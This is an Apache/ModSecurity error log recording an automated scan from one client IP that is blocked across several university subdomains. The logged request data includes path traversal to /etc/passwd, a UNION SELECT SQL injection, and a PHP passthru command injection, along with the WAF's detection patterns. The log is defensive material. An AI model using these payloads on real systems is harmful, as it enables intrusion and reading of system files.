[Tue Aug 29 11:47:34.529237 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjbw0kAAAAW"]
[Tue Aug 29 11:47:34.542119 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjW9EwAAAAA"]
[Tue Aug 29 11:47:34.548670 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjbw0oAAAAW"]
[Tue Aug 29 11:47:34.603620 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjW9E8AAAAA"]
[Tue Aug 29 11:47:34.653556 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjCbIIAAAAB"]
[Tue Aug 29 11:47:35.563153 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14Z8Co-f0AAAjav3cAAAAV"]
[Tue Aug 29 11:47:36.988500 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14aMCo-f0AAAjCbJ0AAAAB"]
[Tue Aug 29 11:47:37.368683 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14acCo-f0AAAjM7FMAAAAT"]
[Tue Aug 29 11:47:37.417279 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjbw1YAAAAW"]
[Tue Aug 29 11:47:37.459009 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjbw1gAAAAW"]
[Tue Aug 29 11:47:37.466578 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjCbKMAAAAB"]
[Tue Aug 29 11:47:37.498454 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjbw1oAAAAW"]
[Tue Aug 29 11:47:38.417498 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14asCo-f0AAAjL8VMAAAAR"]
[Tue Aug 29 11:47:39.357585 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14a8Co-f0AAAjZRbsAAAAS"]
[Tue Aug 29 11:47:39.396760 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAi2yJYAAAAN"]
[Tue Aug 29 11:47:39.409843 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjZRbwAAAAS"]
[Tue Aug 29 11:47:39.426282 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjCbKoAAAAB"]
[Tue Aug 29 11:47:39.428535 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAkNPmIAAAAI"]
[Tue Aug 29 11:47:39.435894 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAi2yJcAAAAN"]
[Tue Aug 29 11:47:40.373203 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAi2yJgAAAAN"]
[Tue Aug 29 11:47:40.376951 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjav3sAAAAV"]
[Tue Aug 29 11:47:40.380172 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAi2yJgAAAAN"]
[Tue Aug 29 11:47:40.382772 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAj117EAAAAa"]
[Tue Aug 29 11:47:40.384661 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjav3sAAAAV"]
[Tue Aug 29 11:47:40.387233 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAj117EAAAAa"]
[Tue Aug 29 11:47:40.390225 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjZRb4AAAAS"]
[Tue Aug 29 11:47:40.395243 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjZRb4AAAAS"]
[Tue Aug 29 11:47:40.419711 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAhl0LUAAAAi"]
[Tue Aug 29 11:47:40.427504 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAhl0LUAAAAi"]
[Tue Aug 29 11:47:41.425957 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjZRcQAAAAS"]
[Tue Aug 29 11:47:41.435406 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjZRcQAAAAS"]
[Tue Aug 29 11:47:41.504960 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117YAAAAa"]
[Tue Aug 29 11:47:41.513156 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117YAAAAa"]
[Tue Aug 29 11:47:41.525094 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14bcCo-f0AAAkNPm4AAAAI"]
[Tue Aug 29 11:47:41.535218 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117cAAAAa"]
[Tue Aug 29 11:47:41.537127 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GgAAAAA"]
[Tue Aug 29 11:47:41.543310 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117cAAAAa"]
[Tue Aug 29 11:47:41.549994 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GgAAAAA"]
[Tue Aug 29 11:47:41.610378 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAfECFgAAAAO"]
[Tue Aug 29 11:47:41.618044 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAfECFgAAAAO"]
[Tue Aug 29 11:47:41.679691 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bcCo-f0AAAfECFsAAAAO"]
[Tue Aug 29 11:47:42.357678 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAkNPnQAAAAI"]
[Tue Aug 29 11:47:42.360229 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAfECFwAAAAO"]
[Tue Aug 29 11:47:42.379853 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAj117sAAAAa"]
[Tue Aug 29 11:47:42.381745 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAjFoeoAAAAF"]
